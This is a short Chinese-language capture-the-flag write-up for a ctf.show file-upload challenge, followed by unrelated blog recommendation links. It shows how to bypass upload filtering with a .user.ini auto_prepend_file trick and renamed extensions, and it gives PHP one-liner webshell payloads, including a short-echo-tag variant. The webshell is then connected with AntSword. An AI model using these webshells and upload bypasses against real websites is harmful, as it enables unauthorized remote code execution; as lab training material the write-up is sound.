ctf show web 入门155

本题跟上一题一样先上传一个.user.ini文件文件内容是:auto_prepend_file=一句话木马将文件名改为.user.ini.png是为了绕过前端验证用bp抓包后需要把文件名改回为.user.ini防止因修改后缀名导致错误

上传成功后将包含一句话木马的文件也上传到该网站尝试修改一句话木马将: <?php @eval(_POST\['attack'\]);?\>改为 \_POST['attack']);?>使用大写来绕过限制

说明此时有更严格的校验,我们尝试给文件加上一个图片的文件头

发现也失败了是因为本题php被过滤了,但其实做法跟上题差不多,需要注意的是再编写一个短输出标签(方便绕过php)形式的一句话木马shortmuma.php替换为:<?=@eval($_POST['attack']); ?> 现在发现成功上传

现在就可以尝试使用蚁剑连接
连接成功拿到flag

相关推荐
Afans_fire2 小时前
全媒体运营:从流量到转化的实战策略
笔记·百度·抖音·小红书运营·巨量引擎
Hua-Jay2 小时前
OpenCV联合C++/Qt 学习笔记(二十三)----图像校正及单目位姿估计
c++·笔记·qt·opencv·学习·计算机视觉
lqj_本人3 小时前
鸿蒙PC:鸿蒙版本 Electron 框架环境搭建并且实现 XH 笔记应用
笔记·electron·harmonyos
Upsy-Daisy3 小时前
AI Agent 项目学习笔记(九):网页搜索、网页抓取与资源下载工具
笔记·python·学习
kels88993 小时前
实时外汇api的节假日交易时间表,能自动判断休市吗?
开发语言·经验分享·笔记·python·金融·区块链
xian_wwq3 小时前
【学习笔记】探讨大模型应用安全建设系列4——Agent 权限治理与工具调用安全
笔记·学习·安全
不是山谷.:.3 小时前
前端零基础入门:WebSocket 全解析
前端·笔记·websocket·状态模式
stars-he3 小时前
Silvaco 仿真NMOS 差分对器件剖面结构图
笔记·学习
清平乐的技术专栏3 小时前
【FlinkSQL笔记】(二)Flink SQL 基础语法详解
笔记·sql·flink